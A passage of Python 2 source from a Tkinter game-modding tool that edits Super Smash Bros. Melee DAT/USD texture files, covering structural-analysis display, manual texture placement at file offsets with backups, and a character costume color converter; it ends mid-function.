	def updateWidget( self, widget, newHex ):
		""" Just handles some cosmetic changes for the widget. Actual saving
			of the data is handled by the updateFlagsInFile method. """
		# Update the values shown
		widget.delete( 0, 'end' )
		widget.insert( 0, newHex )
		# Change the background color of the widget, to show that changes have been made to it and are pending saving
		widget.configure( background='#faa' )
		# Add the widget to a list to keep track of what widgets need to have their background restored to white when saving
		global editedDatEntries
		editedDatEntries.append( widget )
def showStructInStructuralAnalysis( structOffset ):
	""" Adds the given structure (and any parents required to reach it) to the
		Structural Analysis treeview, then focuses/selects all of its instances.
		Returns a human-readable string describing the result of the operation. """
	tree = Gui.fileStructureTree
	# Make sure the tab's base items (header/RT/root&reference nodes/etc) exist first
	if not tree.get_children():
		analyzeDatStructure()
	# Add the structure plus all required ancestor structs, timing the operation
	startTime = time.clock()
	addParentStructures( structOffset, initialCall=True )
	print( 'time to add parents: ' + str(time.clock() - startTime) )
	# Collect the iids of every instance of this struct now present in the treeview
	structIids = getStructureIids( (structOffset,) )
	if structIids:
		firstIid = structIids[0]
		tree.focus( firstIid ) # Give keyboard focus to the first instance
		tree.see( firstIid ) # Scroll it into view (folders should already be expanded)
		tree.selection_set( structIids )
		if len( structIids ) == 1:
			resultsText = '1 instance of this structure was found.'
		else:
			resultsText = '{} instances of this structure were found.'.format( len(structIids) )
		# Widen the treeview's main column if needed to fit the new items
		mainColumnWidth = tree.column( '#0', 'width' ) # Excludes the Offset column
		for iid in structIids:
			adjustSavColumnWidth( iid, mainColumnWidth )
	else:
		# Unable to add the structure; it may be an orphan
		resultsText = 'Unable to add this to the treeview, which means that it may be an orphan, or a decendant of one.'
	print( resultsText )
	return resultsText
class ColorSwatch( ttk.Label ):

	""" A small circular color example rendered onto a label widget; clicking it opens a
		color picker for editing (when an entry widget is attached).
		hexColor should be an 8 character hex string of RRGGBBAA """

	# Not using the imageBank in this case to avoid ImageTk.PhotoImage
	colorMask = Image.open( imagesFolder + "\\colorChooserMask.png" )

	def __init__( self, parent, hexColor, entryWidget=None ):
		ttk.Label.__init__( self, parent, cursor='hand2' )
		# Only swatches tied to an entry widget respond to clicks
		if entryWidget:
			self.entryWidget = entryWidget
			self.bind( '<1>', self.editColor )
		self.renderCircle( hexColor )

	def renderCircle( self, hexColor ):
		""" Draws the circular swatch for the given color and attaches the resulting
			image to this widget (also preventing its garbage collection). """
		circleColor = hex2rgb( hexColor )[0]
		# Draw a large circle, then shrink it; scaling down creates anti-aliased
		# edges (it would just be a hexagon otherwise)
		canvas = Image.new( 'RGBA', (160, 160), (0, 0, 0, 0) )
		ImageDraw.Draw( canvas ).ellipse( (10, 10, 150, 150), fill=circleColor )
		canvas.thumbnail( (16, 16), Image.ANTIALIAS )
		# Overlay the highlight/shadow mask on top of the color (for a depth effect)
		canvas.paste( self.colorMask, (0, 0), self.colorMask )
		self.swatchImage = ImageTk.PhotoImage( canvas )
		self.configure( image=self.swatchImage )

	def editColor( self, event ):
		""" Click handler; opens a color picker and, if a new valid color was chosen,
			applies it to the attached entry widget and the file data. """
		colorPicker = MeleeColorPicker( 'Modifying ' + self.entryWidget.updateName, initialColor=self.entryWidget.get() )
		Gui.root.wait_window( colorPicker.window ) # Wait for the picker window to close before proceeding
		# An unchanged color means the operation was canceled, or there's nothing to do
		if colorPicker.initialColor == colorPicker.currentHexColor:
			return
		if len( colorPicker.currentHexColor ) != self.entryWidget.byteLength * 2:
			msg( 'The value generated from the color picker (' + colorPicker.currentHexColor + ') does not match the byte length requirement of the destination.' )
		else:
			# Replace the text in the entry widget
			self.entryWidget.delete( 0, 'end' )
			self.entryWidget.insert( 0, colorPicker.currentHexColor )
			# Update the data in the file with the entry's data, and redraw the color swatch
			updateEntryHex( '', widget=self.entryWidget )
# def modifyFolders( parentIid, openFolders ): # Collapses or expands all folder items in a treeview (of level parentIid or lower).
# for item in Gui.fileStructureTree.get_children( parentIid ):
# if len( Gui.fileStructureTree.get_children(item) ) != 0: # Item is a folder.
# Gui.fileStructureTree.item( item, open=openFolders )
# modifyFolders( item, openFolders )
# def expandSAV( tags ):
# if tags == '':
# modifyFolders( '', True )
# else:
# # First, collapse all items.
# modifyFolders( '', False )
# # Expand items, down to the level specified.
# targetItems = Gui.fileStructureTree.tag_has( tags )
# for iid in targetItems:
# Gui.fileStructureTree.item( iid, open=True )
# parent = Gui.fileStructureTree.parent( iid )
# while parent != '':
# Gui.fileStructureTree.item( parent, open=True )
# parent = Gui.fileStructureTree.parent( parent )
# def collapseSAV( tags ):
# # First, collapse all items.
# modifyFolders( '', False )
# targetItems = Gui.fileStructureTree.tag_has( tags )
# for iid in targetItems:
# parent = Gui.fileStructureTree.parent( iid )
# while parent != '':
# Gui.fileStructureTree.item( parent, open=True )
# parent = Gui.fileStructureTree.parent( parent )
# def highlightSAV( tag, highlightColor ):
# Gui.fileStructureTree.tag_configure( tag, background=highlightColor )
# def setSAVlineHighlights(): # Adds/removes line highlighting on the Structural Analysis tab.
# for tag, color, variable in Gui.savHighlightColors:
# if variable.get(): Gui.fileStructureTree.tag_configure( tag, background=color )
# else: Gui.fileStructureTree.tag_configure( tag, background='' )
# def removeAllSAVlineHighlighting():
# for tag, color, variable in Gui.savHighlightColors:
# Gui.fileStructureTree.tag_configure( tag, background='' )
# variable.set( False )
#===============================#
# ~ ~ Manual Placements tab ~ ~ #
#===============================#
def scanFolderStructure():
	""" Prompts the user to choose a folder, then gathers every PNG and TPL file
		found within it (and all of its subfolders, recursively), and sends the
		collected paths to the Manual Placements text area via showSelectedPaths().
		Also remembers the chosen folder as the new default search directory. """

	# Prompt the user to choose a folder to look for textures in
	parentFolder = tkFileDialog.askdirectory(
		title="Choose a folder. All PNGs and TPLs in the chosen folder, and in all subfolders, will be selected.",
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		mustexist=True)

	if parentFolder != '':
		# Update the default directory to start in when opening or exporting files.
		with open( settingsFile, 'w') as theSettingsFile:
			settings.set( 'General Settings', 'defaultSearchDirectory', parentFolder )
			settings.write( theSettingsFile )

		# Collect image files from the parent folder and all subfolders in a single walk.
		# (os.walk silently skips directories it can't access, e.g. hidden/protected items,
		# which the previous manual listdir loop had to catch as WindowsError.)
		imageFilesArr = []
		for dirPath, _, fileNames in os.walk( parentFolder ):
			for filename in fileNames:
				if filename.lower().endswith( ('.tpl', '.png') ): # endswith accepts a tuple of suffixes
					imageFilesArr.append( dirPath + '\\' + filename )

		showSelectedPaths( imageFilesArr )
def showSelectedPaths( imageFiles ):
	""" Adds the given PNG/TPL file paths to the Manual Placements text area, one per line,
		in the form 'filepath --> offset' (offset parsed from the filename when available).
		Non-image files are collected separately: a single one is assumed to be a DAT of
		some kind and is opened; multiples are discarded with a warning. """

	# Add new files to the text area, increasing horizontal space if needed.
	missingTexTypes = ''	# Newline-separated report of files whose texture type couldn't be parsed
	nonImages = []			# Files that aren't .png/.tpl
	for i in xrange( len(imageFiles) ):
		imagePath = imageFiles[i]
		fileExt = os.path.splitext( imagePath )[1].lower()
		if fileExt == '.png' or fileExt == '.tpl':
			# Parse the texture type and data offset out of the filename, e.g. 'IfAll.usd_0x76280_9.png'
			imageType, offset, sourceFile = codecBase.parseFilename( os.path.basename( imagePath ) )
			if imageType == -1:
				missingTexTypes += '\n' + imagePath
				continue

			# Write the file path and offset (if available) to the appropriate text field.
			if offset != -1 and validOffset( str(offset) ): offset = uHex( offset )
			else: offset = ''
			standardizedPath = imagePath.replace('/', '\\') + ' --> ' + offset
			# Distance from the Text widget's 'end' index back to the start of the ' --> '
			# arrow (accounts for the widget's implicit trailing newline)
			arrowPosFromEnd = len( offset ) + 6
			adjustTextAreaWidth( standardizedPath, Gui.imageTextArea )
			if i == 0 and len( recallFilepaths() ) == 0: ## i.e. first entry of the text field. (i==0 probably isn't necessary, but short-circuits for efficiency.)
				Gui.imageTextArea.insert( 'end', standardizedPath )
			else: Gui.imageTextArea.insert( 'end', "\n" + standardizedPath )

			# Color the arrow (the 3-character '-->' span just inserted).
			Gui.imageTextArea.tag_add('offsetArrow', 'end - ' + str( arrowPosFromEnd ) + ' chars', 'end - ' + str( arrowPosFromEnd - 3 ) + ' chars')
		else:
			nonImages.append( imagePath )

	# If there was exactly one non-image file included, give it the benefit of the doubt that it is a DAT of some kind, and set it as such.
	if len(nonImages) == 1: fileHandler( nonImages )
	elif len(nonImages) > 1: msg( 'Multiple non-PNG/TPL files were given, which were discarded.' )

	# Update the GUI on total textures gathered.
	Gui.sourceTexturesText.set( "Texture(s):\n (" + str(len( recallFilepaths() )) + " total)" )

	if missingTexTypes != '':
		#updateProgramStatus( 'Missing Types!' )
		msg("A texture type wasn't found for the following textures (the " + \
			'type should appear at the end of the file name, e.g. the "_9" in ' + \
			'"IfAll.usd_0x76280_9.png"):\n\n' + missingTexTypes)
def adjustTextAreaWidth( newestPath, targetWidget ):
	""" Widens the given text widget (and the program window along with it)
		whenever the newly added path is longer than the widget's current width. """

	requiredWidth = len( newestPath )
	if requiredWidth <= targetWidget.cget( "width" ):
		return # Plenty of room already

	# Pad the widget a little beyond the longest line, then resize the window to fit
	targetWidget.config( width=requiredWidth + 3 )
	Gui.mtrTabRow2.update()
	Gui.root.geometry( str(Gui.mtrTabRow2.winfo_reqwidth()) + 'x' + str(Gui.root.winfo_height()) )
def recallFilepaths():
	""" Reads the Manual Placements text area and returns a list of its
		non-empty lines, with any double-quote characters stripped out. """

	lastLineNumber = int( Gui.imageTextArea.index( 'end-1c' ).split( '.' )[0] )

	filepaths = []
	for lineNumber in xrange( 1, lastLineNumber + 1 ): # Tkinter text lines are 1-indexed
		lineText = Gui.imageTextArea.get( str(lineNumber) + '.0', str(lineNumber + 1) + '.0-1c' ).replace( '"', '' )
		if lineText:
			filepaths.append( lineText )

	return filepaths
def onTextAreaKeyUp( event ):
	""" Key-release handler for the texture paths text area. Grows the widget if the
		current line no longer fits, re-colors the '-->' offset pointer on that line,
		and refreshes the texture total shown in the GUI. """

	textWidget = event.widget

	# Fetch the full text of the line that the insertion cursor is on
	cursorLine = textWidget.index( 'insert' ).split( "." )[0]
	lineContents = textWidget.get( cursorLine + '.0', str(int(cursorLine) + 1) + '.0-1c' )

	# Expand the area for text fields if there is not enough space.
	adjustTextAreaWidth( lineContents, textWidget )

	# Color the arrow which points out the offset, if one is present on this line
	arrowIndex = lineContents.find( '-->' )
	if arrowIndex != -1:
		textWidget.tag_add( 'offsetArrow', cursorLine + '.' + str(arrowIndex), cursorLine + '.' + str(arrowIndex + 3) )

	# Update the GUI on total textures gathered.
	Gui.sourceTexturesText.set( "Texture(s):\n (" + str(len(recallFilepaths())) + " total)" )
def overwriteImagesManually():
	""" Main import routine for the Manual Placements tab. For each 'filepath --> offset(s)'
		line in the text area, encodes the image to TPL texture data and writes it directly
		into the destination DAT/USD file at the given offset(s), optionally creating a
		versioned backup of the file first. Lines in the text area are tagged (highlighted)
		to reflect each result, and a summary message is shown when finished. """

	datFilePath = Gui.datDestination.get().replace('"', '')

	# Start with a preliminary check that something is given for a DAT filepath and that DAT file can be found.
	if datFilePath == '': msg( 'No DAT or USD file has been set.' )
	elif not os.path.exists( datFilePath ):
		msg( 'The destination file (DAT/USD) could not be found.\n\n(This import method currently only supports standalone files, i.e. those not in a disc.)' )
	else:
		## Check that something is given for the texture filepaths.
		imagePathsAndOffsets = recallFilepaths()
		if imagePathsAndOffsets == []: msg( 'No texture(s) selected.' ) #infoText.set('You must add textures above.')
		else:
			# Newline-separated accumulators for the various per-file failure reports
			imagesNotFound = ''
			offsetsNotFound = ''
			unsupportedFiles = ''
			missingTypes = ''
			generalFailures = ''
			datFileToOpen = datFilePath
			datFilename, datFileExt = os.path.splitext( os.path.basename(datFileToOpen) )
			newDatFilepath = ''

			if Gui.mtrSaveBackup.get():
				# Determine a backup filename of the form '[the hack. vN]_name.ext',
				# bumping the version number until an unused filename is found.
				datFileDir = os.path.split( datFilePath )[0]
				if '[the hack. v' in datFilename:
					nameStartPoint = datFilename.index(']_')

					# Separate out the last decimal part from the version number.
					version = datFilename[:nameStartPoint].split('v')[1]
					if '.' in version: baseVer = datFilename[:nameStartPoint].rsplit('.')[0]
					else: baseVer = version

					newDatFilepath = datFileDir + '\\[the hack. v' + baseVer + '.' + '1' + datFilename[nameStartPoint:] + datFileExt
					fileVersionCount = 1
					while os.path.exists( newDatFilepath ):
						fileVersionCount += 1
						newDatFilepath = datFileDir + '\\[the hack. v' + baseVer + '.' + str(fileVersionCount) + datFilename[nameStartPoint:] + datFileExt
				else:
					newDatFilepath = datFileDir + '\\[the hack. v1]_' + datFilename + datFileExt
					fileVersionCount = 1
					while os.path.exists( newDatFilepath ):
						fileVersionCount += 1
						newDatFilepath = datFileDir + '\\[the hack. v' + str(fileVersionCount) + ']_' + datFilename + datFileExt

				# Filepath determined. Try to create the back-up.
				try:
					shutil.copy(datFilePath, newDatFilepath)
					datFileToOpen = newDatFilepath # All writes below then go to the backup copy
				except:
					if not tkMessageBox.askyesno('Proceed without backup?', 'A backup of the ' + datFileExt.upper() + ' file could not be created. \n'
							'(You may want to check if the file is read or write\nprotected, or copy the file manually.) \n\n'
							'Do you want to proceed with the overwrite anyway?'):
						return ## Exit this function without performing any image overwriting.
					newDatFilepath = '' # Cleared since a back-up won't be created.

			clearHighlighting()
			imagesOverwritten = 0
			imagesNotOverwritten = 0
			palettesCreated = 0
			showPaletteWarning = False

			with open(datFileToOpen, 'r+b') as datBinary:
				## For each image...
				for currentLine, imagePathAndOffset in enumerate(imagePathsAndOffsets):
					## enumerate starts at 0, but tkinter starts line counts at 1, so increase the enumerated value to match.
					currentLine = currentLine + 1

					## Check that there is an offset provided for this image.
					if '-->' in imagePathAndOffset:
						(imageFilepath, offsets) = imagePathAndOffset.split('-->')

						## Remove leading and/or trailing whitespace from the variables.
						imageFilepath = imageFilepath.strip()

						# One image may be written to several comma-separated offsets
						for imageOffset in offsets.split(','):
							imageOffset = imageOffset.strip().replace('0x', '').replace('0X', '')

							# An 'imageOffset:paletteOffset' pair means the palette data is stored
							# separately from the image data in the destination file
							separatedPalette = False
							if ':' in imageOffset:
								(imageOffset, paletteOffset) = imageOffset.split(':')
								imageOffset = imageOffset.strip()
								paletteOffset = paletteOffset.strip()
								separatedPalette = True

							## Confirm that the offsets exists and are each a hexadecimal number.
							if validOffset(imageOffset) and (not separatedPalette or validOffset(paletteOffset)): # Third condition only evaluated if separatedPalette = True.
								## Check that the current image file can be found.
								if os.path.exists( imageFilepath ):
									# Encode the image file to TPL texture data; 'status' records the outcome
									try:
										newImage = tplEncoder( imageFilepath, imageType=codecBase.parseFilename( os.path.basename( imageFilepath ) )[0] )
										imageData = newImage.encodedImageData
										paletteData = newImage.encodedPaletteData
										status = 'dataObtained'
									except TypeError: # For CMPR (_14) textures; uses wimgt
										status, _, imageData, _, paletteData = getImageFileAsTPL( imageFilepath, '' )
									except IOError: status = 'formatUnsupported'
									except missingType: status = 'imageTypeNotFound'
									except: status = 'encodingError'

									if status == 'dataObtained' or status == 'dataWithAdHocPalette':
										if separatedPalette:
											## Convert the offset to base 16 and then use that to seek to the texture location.
											datBinary.seek( int(imageOffset, 16) )
											datBinary.write( bytearray.fromhex(imageData) )

											## Convert the offset to base 16 and then use that to seek to the palette location.
											datBinary.seek( int(paletteOffset, 16) )
											datBinary.write( bytearray.fromhex(paletteData) )
										else:
											if paletteData != '':
												imageData = imageData + paletteData

											## Convert the offset to base 16 and then use that to seek to the texture location.
											datBinary.seek( int(imageOffset, 16) )
											datBinary.write( bytearray.fromhex(imageData) )

										# Perform line highlighting
										if status == 'dataObtained':
											Gui.imageTextArea.tag_add( 'successfulOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
										else:
											# 'dataWithAdHocPalette'; a palette had to be generated for the image
											Gui.imageTextArea.tag_add( 'warningOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
											palettesCreated = palettesCreated + 1
											showPaletteWarning = True
										imagesOverwritten += 1
									elif status == 'formatUnsupported':
										unsupportedFiles = unsupportedFiles + imageFilepath + '\n'
										Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
										imagesNotOverwritten += 1
									elif status == 'imageTypeNotFound':
										missingTypes = missingTypes + imageFilepath + '\n'
										Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
										imagesNotOverwritten += 1
									else:
										generalFailures = generalFailures + imageFilepath + '\n'
										Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
										imagesNotOverwritten += 1
								else:
									imagesNotFound = imagesNotFound + imageFilepath + '\n'
									Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
									break # The file won't exist for the remaining offsets on this line either
							else:
								if separatedPalette:
									offsetsNotFound = offsetsNotFound + imageFilepath + ' with ' + imageOffset + ':' + paletteOffset + '\n'
									Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
								else:
									offsetsNotFound = offsetsNotFound + imageFilepath + ' with ' + imageOffset + '\n'
									Gui.imageTextArea.tag_add( 'failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c' )
					else:
						# No '-->' on this line; nothing can be written without an offset
						offsetsNotFound = offsetsNotFound + imagePathAndOffset + '\n'
						Gui.imageTextArea.tag_add('failedOverwrite', str(currentLine)+'.0', str(currentLine+1)+'.0-1c')

			## This point is after the image file injection loop and closure of the DAT/USD file.
			## If a back-up was created, but no changes were made from the original file, don't keep the new copy.
			if imagesOverwritten == 0 and newDatFilepath != '':
				try: os.remove( newDatFilepath )
				except: pass

			if showPaletteWarning == True:
				if palettesCreated == 1:
					msg('No palette was detected for the texture marked in yellow. It was given one and succefully ' # infoText.set
						'written into the ' + datFileExt.replace('.','').upper() + ', however, you will achieve better image quality '
						'if you give the texture a palette in your image editor beforehand.')
				else:
					msg('No palette was detected for the textures marked in yellow. They were given one and succefully '
						'written into the ' + datFileExt.replace('.','').upper() + ', however, you will achieve better image quality '
						'if you give the textures a palette in your image editor beforehand.') # infoText.set

			## Begin creating a completion message of what was done.
			if imagesOverwritten == 1:
				completionMessage = 'Procedure complete! 1 image in the ' + datFileExt.upper() + ' was overwritten.'
			elif imagesOverwritten > 1:
				completionMessage = 'Procedure complete! ' + str(imagesOverwritten) + ' images in the ' + datFileExt.upper() + ' were overwritten.'
			else:
				completionMessage = ''

			## Append notification of unprocessed image files (due to no offset info, or unsupported types).
			if completionMessage == '' and offsetsNotFound != '':
				## (No images were overwritten).
				completionMessage = completionMessage + \
					'The following images were not processed because proper offsets \n' + \
					'were not given or not found:\n\n' + offsetsNotFound
			elif offsetsNotFound != '':
				## Notification of at least some images being overwritten was appended to the completion message.
				completionMessage = completionMessage + \
					'\n\nHowever, the following images were not processed because \n' + \
					'proper offsets were not given or not found:\n\n' + offsetsNotFound

			## Append notification of image files not found.
			if imagesOverwritten == 0 and offsetsNotFound == '' and imagesNotFound != '':
				## No previous messages have been appended to the completion message (no images were overwritten, yet offsets were given).
				completionMessage = completionMessage + 'The image files were not found.'
			elif imagesOverwritten > 0 and offsetsNotFound == '' and imagesNotFound != '':
				completionMessage = completionMessage + '\n\nHowever, the following image files were not found:\n\n' + imagesNotFound
			elif offsetsNotFound != '' and imagesNotFound != '':
				completionMessage = completionMessage + \
					'\n\nAlso, the following image files were not found:\n\n' + imagesNotFound

			## Append notification of images not processed due to unsupported file types or image formats.
			if unsupportedFiles != '':
				completionMessage = completionMessage + \
					"\n\nThe following images were not written in because the image doesn't\n" + \
					"have correct formatting for a .TPL or .PNG (you might want to\n" + \
					"try getting a new copy of the image):\n\n" + unsupportedFiles
			if missingTypes != '':
				completionMessage = completionMessage + \
					"\n\nAn image type wasn't found for the following images\n" + \
					'(the type should appear at the end of the file name, e.g. the "_2" in' + \
					'"MnSlMap.usd_0x38840_2.png"):\n\n' + missingTypes
				updateProgramStatus( 'Missing Types!' )
			if generalFailures != '':
				completionMessage = completionMessage + \
					"\n\nThe following images failed to import due to an encoding error:\n\n" + generalFailures
				updateProgramStatus( 'Failed Imports!' )

			if imagesNotOverwritten > 0: updateProgramStatus( 'Failed Imports' )
			else: updateProgramStatus( 'Import Successful' )
			msg(completionMessage)
def clearHighlighting():
	""" Removes all overwrite-result highlighting from the Manual Placements text area. """

	for tagName in ( 'successfulOverwrite', 'warningOverwrite', 'failedOverwrite' ):
		Gui.imageTextArea.tag_remove( tagName, '1.0', 'end' )
#===================================#
# ~ ~ Character Color Converter ~ ~ #
#===================================#
def cccSelectStandalone( role ):
	""" Prompts the user for a standalone character texture file, reads it as a hex
		string, and hands it off to prepareColorConversion() for the given role
		('source' or destination) on the Character Color Converter tab. """

	filepath = tkFileDialog.askopenfilename(
		title="Choose a character texture file.",
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		filetypes=[ ('Texture data files', '*.dat *.usd *.lat *.rat'), ('All files', '*.*') ]
	)

	# Bail if the prompt was canceled, or the chosen path can't be found
	if filepath == '' or not os.path.exists( filepath ):
		return

	# Get the DAT data and relocation table from the target file (includes the file header)
	with open( filepath , 'rb') as binaryFile:
		datHex = binaryFile.read().encode( 'hex' )

	prepareColorConversion( filepath, datHex, role )
def cccPointToDiscTab():
	""" Switches the user to the Disc File Tree tab; prompts for a disc if none
		is loaded yet, otherwise scrolls to the character files section. """

	Gui.mainTabFrame.select( Gui.discTab )

	if globalDiscDetails['isoFilePath'] == '':
		promptToOpenFile( 'iso' )
	else:
		scrollToSection( 'Characters' )
def prepareColorConversion( filepath, datHex, role ): # datHex includes the file header
	""" Parses and validates a character costume file for the Character Color Converter tab,
		displays its character/color identification (with a colored universe insignia) on the
		appropriate canvas, and stores its data for the actual conversion step.

			filepath:	a path to a standalone file, OR the iid of a file within a loaded disc
			datHex:		the file's full contents as a hex string (including the 0x20-byte header)
			role:		'source' updates the source canvas/data; any other value, the destination """

	# Parse the DAT file header fields (each value is 4 bytes / 8 hex characters)
	rtStart = int( datHex[8:16], 16 ) # Size of the data block
	rtEntryCount = int( datHex[16:24], 16 )
	rootNodeCount = int( datHex[24:32], 16 )
	referenceNodeCount = int( datHex[32:40], 16 )
	rtEnd = rtStart + (rtEntryCount * 4)
	rootNodesEnd = rtEnd + (rootNodeCount*8)
	tempFileHeader = datHex[:64]
	datHex = datHex[64:] # Removes the header
	stringTable = datHex[rootNodesEnd*2 + (referenceNodeCount *16):]
	firstString = stringTable.decode('hex').split('\x00')[0] # Strings separated by stop byte, '\x00'

	# Validate the parsing, and therefore also the file.
	if not firstString[:3] == 'Ply': msg( "This file doesn't appear to be a character costume!" )
	elif '5K' not in firstString:
		if 'Kirby' in firstString: msg( "Only Kirby's base color files are supported (e.g. 'PlKbBu'). "
			"You'll have to modify this one manually. Luckily, none of his files have many textures." )
		else: # If here, this must be Master/Crazy Hand, or one of the Fighting Wire Frames.
			msg( "This character doesn't have multiple color files. \nThere is nothing to convert." )
	else:
		# Parse the root node string, e.g. 'PlyPeach5KYe...' -> charKey='Peach', colorKey='Ye'
		charKey, colorKey = firstString[3:].split( '5K' )
		if colorKey.startswith('_'): colorKey = 'Nr' # No color code present means the Neutral costume
		else: colorKey = colorKey.split('_')[0]

		# Check if the filepath is actually a path to a file, or is actually the iid for a file in a disc.
		if not Gui.isoFileTree.exists( filepath ):
			# Update the default search directory.
			dirPath = os.path.dirname( filepath )
			with open( settingsFile, 'w') as theSettingsFile:
				#if not settings.has_section('General Settings'): settings.add_section('General Settings')
				settings.set( 'General Settings', 'defaultSearchDirectory', dirPath )
				settings.write( theSettingsFile ) # Updates a pre-existing settings file entry, or just creates a new file.

		# NOTE(review): the line below is a plain 'if' rather than the start of the elif chain,
		# so for Game & Watch the chain below still runs (likely hitting the failsafe message
		# too, since 'Gamewatch' presumably isn't in CCC) — confirm whether this is intended.
		if charKey == 'Gamewatch': msg( 'Game & Watch has no textures to swap!' )
		if charKey == 'Gkoopa': msg( 'Giga Bowser only has one color file! \nThere is nothing to convert.' )
		elif charKey == 'Peach' and colorKey == 'Ye':
			msg("Peach's yellow costume has too many differences from the other colors to map. You'll need to convert this costume manually. (Using the DAT Texture Tree tab to "
				"dump all textures from the source file, and then you can use those to replace the textures in the destination file. Although there are likely textures "
				"that do not have equivalents.) Sorry about that; this is actually the only character & color combination not supported by this tool.")
		elif charKey not in CCC or colorKey not in CCC[charKey]:
			# Failsafe scenario. Shouldn't actually be able to get here now that everything besides yellow Peach (handled above) should be mapped.
			msg( 'This character or color is not supported. \n\nID (first root node string): ' + firstString + \
				'\n\nCharacter key found: ' + str(charKey in CCC) + '\nColor key found: ' + str(colorKey in charColorLookup) )
		else:
			# Get an image that is greyscale with alpha
			insigniaPath = imagesFolder + "\\universe insignias\\" + CCC[charKey]['universe'] + ".png"
			greyscaleInsignia = Image.open( insigniaPath ).convert('L')

			# Look up the color to use for the insignia
			insigniaColor = charColorLookup[colorKey]
			if insigniaColor == 'neutral': insigniaColor = ( 210, 210, 210, 255 ) # Light grey for the Neutral costume

			# Create a blank canvas, and combine the other images onto it (the greyscale
			# insignia acts as the compositing mask over the solid color screen)
			blankImage = Image.new( 'RGBA', greyscaleInsignia.size, (0, 0, 0, 0) )
			colorScreen = Image.new( 'RGBA', greyscaleInsignia.size, insigniaColor ) #(0, 0, 255, 255)
			completedInsignia = ImageTk.PhotoImage( Image.composite( blankImage, colorScreen, greyscaleInsignia) )

			if role == 'source':
				Gui.cccSourceCanvas.delete('all')
				Gui.cccSourceCanvas.insigniaImage = completedInsignia # Reference kept to prevent garbage collection

				# Attach the images to the canvas
				Gui.cccSourceCanvas.create_image( 0, 0, image=Gui.cccSourceCanvas.insigniaImage, anchor='nw' )
				#font=tkFont.Font(family='TkDefaultFont', size=9, weight='bold')
				Gui.cccSourceCanvas.create_text( Gui.cccIdentifiersXPos, 20, anchor='w', fill=Gui.globalFontColor, font="-weight bold -size 10", text='Character: ' + CCC[charKey]['fullName'])
				Gui.cccSourceCanvas.create_text( Gui.cccIdentifiersXPos, 44, anchor='w', fill=Gui.globalFontColor, font="-weight bold -size 10", text='Costume Color: ' + charColorLookup[colorKey].capitalize())

				# Store the parsed file info for the conversion step
				CCC['dataStorage']['sourceFile'] = filepath
				CCC['dataStorage']['sourceFileChar'] = charKey
				CCC['dataStorage']['sourceFileColor'] = colorKey
				CCC['dataStorage']['sourceFileHeader'] = tempFileHeader
				CCC['dataStorage']['sourceFileData'] = datHex
			else:
				Gui.cccDestCanvas.delete('all')
				Gui.cccDestCanvas.insigniaImage = completedInsignia # Reference kept to prevent garbage collection

				# Attach the images to the canvas
				Gui.cccDestCanvas.create_image( 0, 0, image=Gui.cccDestCanvas.insigniaImage, anchor='nw' )
				#font=tkFont.Font(family='TkDefaultFont', size=9, weight='bold')
				Gui.cccDestCanvas.create_text( Gui.cccIdentifiersXPos, 20, anchor='w', fill=Gui.globalFontColor, font="-weight bold -size 10", text='Character: ' + CCC[charKey]['fullName'])
				Gui.cccDestCanvas.create_text( Gui.cccIdentifiersXPos, 44, anchor='w', fill=Gui.globalFontColor, font="-weight bold -size 10", text='Costume Color: ' + charColorLookup[colorKey].capitalize())

				# Store the parsed file info for the conversion step
				CCC['dataStorage']['destFile'] = filepath
				CCC['dataStorage']['destFileChar'] = charKey
				CCC['dataStorage']['destFileColor'] = colorKey
				CCC['dataStorage']['destFileHeader'] = tempFileHeader
				CCC['dataStorage']['destFileData'] = datHex
def convertCharacterColor():
	""" Performs the Character Color Converter tab's conversion: copies each mapped block of
		texture data from the source costume file into the destination costume file, saves
		the result (back into the disc's file tree, or to a standalone file), and reports
		any textures that could not be transferred automatically. """

	# Make sure there's data collected on the source and destination files.
	sourceFilepath = CCC['dataStorage']['sourceFile']
	destFilepath = CCC['dataStorage']['destFile']
	if sourceFilepath == '' or destFilepath == '': msg( 'You must provide both a source and destination file.' )
	else:
		# Collect the rest of the stored data on the source and destination files.
		sourceCharKey = CCC['dataStorage']['sourceFileChar']
		sourceColorKey = CCC['dataStorage']['sourceFileColor']
		sourceDatHex = CCC['dataStorage']['sourceFileData']
		destCharKey = CCC['dataStorage']['destFileChar']
		destColorKey = CCC['dataStorage']['destFileColor']
		destFileHeader = CCC['dataStorage']['destFileHeader']
		destDatHex = CCC['dataStorage']['destFileData']

		if not sourceCharKey == destCharKey: msg( 'Both files must be for the same character.', '''"I can't let you do that, Star Fox!"''' )
		elif sourceColorKey == destColorKey: msg( 'These character costumes are for the same color!\n There is nothing to convert.' )
		else:
			# Per-character/color texture block mappings; presumably lists of (start, end) file offsets — see usage below
			sourceBlocks = CCC[sourceCharKey][sourceColorKey]
			destBlocks = CCC[destCharKey][destColorKey]

			# For each mapped block of texture data for the character files, replace the data block in the destination file with the data block from the source file.
			skipNextBlock = False
			unmodifiedBlocks = [] # Blocks that couldn't be translated; reported to the user afterwards
			for blockIteration in xrange( len(sourceBlocks) ):
				sourceBlockStart, sourceBlockEnd = sourceBlocks[blockIteration]
				sourceBlockStart -= 0x20 # For file header compensation.
				sourceBlockEnd -= 0x20
				sourceBlockLength = sourceBlockEnd - sourceBlockStart
				destBlockStart, destBlockEnd = destBlocks[blockIteration]
				destBlockStart -= 0x20 # For file header compensation.
				destBlockEnd -= 0x20
				destBlockLength = destBlockEnd - destBlockStart

				# Skip copying palette headers if the previous block (probably a block of texture and/or palette data) was skipped.
				if skipNextBlock:
					skipNextBlock = False
					if destBlockLength == 0x1C: # 0x1C-length blocks are treated as palette headers here
						print 'block skipped:', uHex(sourceBlockStart + 0x20)
						continue

				# Skip any untranslatable blocks of data, but notify the user that they were not changed.
